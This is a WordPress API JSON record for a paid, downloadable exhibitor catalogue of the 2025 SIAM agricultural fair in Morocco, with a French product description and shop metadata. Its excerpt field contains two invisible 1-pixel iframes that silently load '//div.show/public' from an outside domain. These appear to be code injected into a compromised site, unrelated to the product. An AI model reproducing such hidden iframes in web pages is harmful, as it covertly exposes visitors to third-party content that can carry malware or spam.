{"id":15955,"date":"2025-05-16T15:01:49","date_gmt":"2025-05-16T14:01:49","guid":{"rendered":"https:\/\/www.salon-agriculture.ma\/?post_type=product&#038;p=15955"},"modified":"2025-05-31T09:25:10","modified_gmt":"2025-05-31T08:25:10","slug":"catalogue-exposant-edition-2025","status":"publish","type":"product","link":"https:\/\/www.salon-agriculture.ma\/en\/product\/catalogue-exposant-edition-2025\/","title":{"rendered":"Catalogue Exposant \u00c9dition 2025"},"content":{"rendered":"<p>D\u00e9couvrez le catalogue des exposants de la 17\u1d49 \u00e9dition du SIAM, plac\u00e9e sous le th\u00e8me \u00ab L\u2019eau au c\u0153ur du d\u00e9veloppement durable \u00bb. Retrouvez les entreprises et institutions engag\u00e9es pour une agriculture durable et innovante<\/p>","protected":false},"excerpt":{"rendered":"<p>Le catalogue num\u00e9rique du SIAM 2025 vous donne acc\u00e8s \u00e0 la liste des exposants de la 17\u00e8me \u00e9dition, avec des informations d\u00e9taill\u00e9es sur les entreprises.<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>","protected":false},"featured_media":15965,"template":"","meta":{"inline_featured_image":false,"_price":"200","_stock":"","_tribe_ticket_header":"","_tribe_default_ticket_provider":"","_tribe_ticket_capacity":"5","_ticket_start_date":"","_ticket_end_date":"","_tribe_ticket_show_description":"","_tribe_ticket_show_not_going":false,"_tribe_ticket_use_global_stock":"","_tribe_ticket_global_stock_level":"","_global_stock_mode":"","_global_stock_cap":"","_tribe_rsvp_for_event":"","_tribe_ticket_going_count":"","_tribe_ticket_not_going_count":"","_tribe_tickets_list":"[]","_tribe_ticket_has_attendee_info_fields":false,"_tec_slr_enabled":"","_tec_slr_layout":""},"product_brand":[],"product_cat":[28],"product_tag":[33,32,31,30],"class_list":{"0":"post-15955","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-catalogues","7":"product_tag-catalogue-exposant","8":"product_tag-catalogue-exposant-siam","9":"product_tag-catalogue-officiel-siam","10":"product_tag-catalogue-siam","12":"first","13":"instock","14":"downloadable","15":"shipping-taxable","16":"purchasable","17":"product-type-simple"},"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product\/15955","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/media\/15965"}],"wp:attachment":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/media?parent=15955"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product_brand?post=15955"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product_cat?post=15955"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product_tag?post=15955"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}